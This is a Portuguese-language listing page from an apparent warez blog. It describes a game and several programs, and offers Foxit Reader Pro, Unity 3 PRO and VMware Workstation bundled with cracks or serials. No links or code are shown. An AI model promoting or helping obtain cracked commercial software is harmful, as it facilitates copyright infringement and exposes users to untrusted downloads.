No novo Assassin’s Creed 2, Altaïr não está mais presente. O personagem que protagonizou o primeiro título está aproximadamente trezentos anos no passado, e agora o protagonista é Ezio, que, por “coincidência”, é a palavra italiana para águia.Ezio Auditore é um nobre de Florença, descendente de Altaïr, e trará para a franquia uma série de modificações. Entre as principais estão nadar e voar (sim, voar), sendo que para esta segunda o protagonista utilizará nada menos que a máquina voadora de Leonardo Da Vinci, uma espécie de avó da asa-delta.

Outras mudanças interessantes são a variedade das armas, que aumenta consideravelmente, liberando machados, outras espadas, lanças, duas lâminas escondidas e muitas outras armas. O jogo se passa em Florença e outras cidades vizinhas.

Requerimentos: 
-Windows XP / Windows Vista / Windows 7
-Processador Intel Core 2 Duo 1.8 GHZ ou AMD Athlon X2 64 2.4GHZ
-Memória RAM 1.5GB para Windows XP, 2.0GB para Windows Vista e Windows 7
-8GB de espaço disponível em disco
-Placa de vídeo com 256MB
-DirectX 9.0c
-DVD-ROM dual-layer drive

Pazera Free FLV to AVI Converter 1.5

Atualmente, existem muitos vídeos codificados no formato Flash ou FLV (Flash Video), disponíveis, por exemplo, no Google Video ou Youtube. O grande problema é que a maioria dos players atuais de mídia não contém suporte para reproduzir esse formato de arquivo.


Converta!

Pazera Free FLV to AVI Converter, como seu próprio nome sugere, converte arquivos de vídeo no formato Flash para AVI e MPEG, que podem facilmente ser gravados em cd e assistidos em aparelhos de DVD ou em players comuns de mídia no próprio computador.


Tamanho: 4,8MB
Linceça: Grátis
Idioma: Ingles
Para: XP/Vista/7

Foxit Reader Pro 3.1.3.1030 + Crack

Foxit Reader Pro é um magnífico leitor de arquivos portáteis, conhecidos como documentos PDF, gratuito que permite visualização, conversão e impressão com uma facilidade imensa. Ele não contém telas de carregamento, nem telas de “Bem-vindo”, que acabam atrapalhando ao invés de ajudar. Ele realmente é ágil, pois basta dar um clique duplo no programa e abrir seu documento PDF sem complicações.


Tamanho: 8 MB
Formato: Rar
Facilidade de Uso: 10
Interface Gráfica: 10
Número de Mídias: 1 CD
Idioma: Inglês

Unity 3 PRO v3.4.0 + Crack

Unity 3 é uma ferramenta de criação integrada que foi projetada para permitir ao usuário concentrar na criação de games 3D ou ou outros conteúdos interativos tais como visualizações arquitetônicas ou animações 3D em tempo real. O aplicativo se assemelha a outros “makers” como o Director, Blender, Virtools, Torque Game Builder ou o Gamestudio, no sentido de que o ambiente gráfico integrado é o método primário de desenvolvimento. Na versão 3.4 Pro o usuário tem a possiilidade de criar jogos das diversas plataformas como Android, Nintendo WII, Xbox 360, PC e Iphone/Ipad.

Tamanho: 414 MB
Formato: Rar
Facilidade de Uso: 10
Interface Gráfica: 10
Número de Mídias: 1 CD
Idioma: Inglês

AVG PC Tuneup

O AVG PC Tuneup é uma ferramenta para otimizar o Sistema Operacional Windows por meio da limpeza de dados desnecessários e correção dos erros nos Registros ou no disco rígido. Ele inclui diversas ferramentas que podem ajudar a melhorar o desempenho do sistema. Esta é uma versão para testes, portanto está limitada em tempo de uso e funções.

Este programa pode trazer grandes alterações para seu sistema, de forma que é sempre recomendado criar um ponto de restauração, pois caso alguma mudança não fique de acordo com o desejado ou haja algum problema, seja possível voltar ao ponto onde ele se encontrava antes da aplicação de qualquer um dos procedimentos.

Titulo: AVG PC Tuneup 2011 v10
Tamanho: 8 MB
Formato: Rar
Facilidade de Uso: 10
Interface Gráfica: 10
Número de Mídias: 1 CD
Idioma: Multi

VMware Workstation 7.1.1 + Serial

VMware Workstation é poderoso desktop virtualização software para desenvolvedores de software / testers e profissionais IT empresa que gere vários sistemas operacionais simultaneamente em um único PC. Os usuários podem executar o Windows, Linux, NetWare, ou Solaris x86 totalmente em rede, portáteis máquinas virtuais – sem reiniciar ou disco rígido particionamento exigido. 
VMware Workstation oferece excelente desempenho e funcionalidades avançadas como a memória ea otimização da capacidade de gestão multi-camadas configurações. Características essenciais, tais como redes virtuais, vivem instantâneos, arrastar e soltar e pastas compartilhadas, e PXE apoio VMware Workstation tornar o mais poderoso e ferramenta indispensável para a empresa IT desenvolvedores e administradores de sistema.

Tamanho: 600 Mb
Formato: Rar
Completo: Sim

TODOS OS LINKS ENCONTRADO AQUI APENAS 2% SÃO PRÓPRIOS, A HACKER DETONATION APENAS APONTA LINKS DE OUTROS SITES/BLOG!